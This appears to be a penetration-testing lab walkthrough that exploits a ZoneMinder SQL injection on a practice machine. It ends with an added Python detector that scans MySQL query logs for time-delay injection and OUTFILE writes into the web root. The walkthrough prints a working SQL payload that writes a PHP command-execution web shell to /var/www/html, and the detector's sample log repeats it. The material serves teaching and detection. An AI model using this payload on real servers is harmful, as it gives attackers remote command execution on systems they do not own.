ZoneMinder SQL injection
https://www.exploit-db.com/exploits/41239
MySQL UDF privilege escalation guide:
https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
An Nmap scan shows ports 80, 8080 and 3305.
Port 80 page:
Port 3305 page:
Running feroxbuster on port 80, we find a zm directory running ZoneMinder.
Searching for known vulnerabilities, we find a SQL injection vulnerability.
Simplifying the payload and sending the request with Burp Suite, we see the application sleep for 5 seconds, which confirms we have SQL injection.
Since port 3305 serves a default page located in /var/www/html, let's try to put a web shell there with this payload:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/webshell.php"
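
From the defender's side, both steps above leave traces in the MySQL general query log when it is enabled. The following is an added example, not part of the original write-up: it flags time-delay functions and INTO OUTFILE/DUMPFILE writes that land in the web root. The log lines, the WEB_ROOTS default and the function names are constructed for illustration.

```python
import posixpath
import re

# Web root named on this page; extend for other document roots (assumption).
WEB_ROOTS = ("/var/www/html",)

SLEEP_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)
OUTFILE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+(['\"])(.+?)\1", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.I)

# Constructed sample lines in the style of a MySQL general query log.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z\t   41 Query\tSELECT id, name FROM cameras ORDER BY id",
    "2024-01-01T10:00:07Z\t   42 Query\tSELECT 1 FROM dual WHERE 1=1 AND SLEEP(5)",
    "2024-01-01T10:01:12Z\t   43 Query\tSELECT \"<?php system($_GET['cmd']);?>\" "
    "INTO OUTFILE \"/var/www/html/webshell.php\"",
    "2024-01-01T10:02:00Z\t   44 Query\tSELECT * FROM report "
    "INTO OUTFILE '/var/lib/mysql-files/r.csv'",
]


def in_web_root(path, web_roots=WEB_ROOTS):
    """True if path, after resolving '.' and '..', lies inside a web root."""
    p = posixpath.normpath(path)
    return any(p == r or p.startswith(r.rstrip("/") + "/") for r in web_roots)


def scan(lines, web_roots=WEB_ROOTS):
    """Return (line_number, rule, detail) tuples for suspicious statements."""
    findings = []
    for n, line in enumerate(lines, 1):
        # Delay functions are rare in application queries and are the usual
        # signal of time-based injection testing.
        if SLEEP_RE.search(line):
            findings.append((n, "time-delay-function", None))
        m = OUTFILE_RE.search(line)
        if m and in_web_root(m.group(2), web_roots):
            # A PHP open tag in the same statement means executable content
            # is being written where the web server will serve it.
            rule = ("php-written-to-web-root" if PHP_TAG_RE.search(line)
                    else "outfile-in-web-root")
            findings.append((n, rule, posixpath.normpath(m.group(2))))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The write itself only succeeds when the database account holds the FILE privilege, secure_file_priv permits the target directory, and the mysqld OS user can write to the web root, so those three settings are the ones to review on the server.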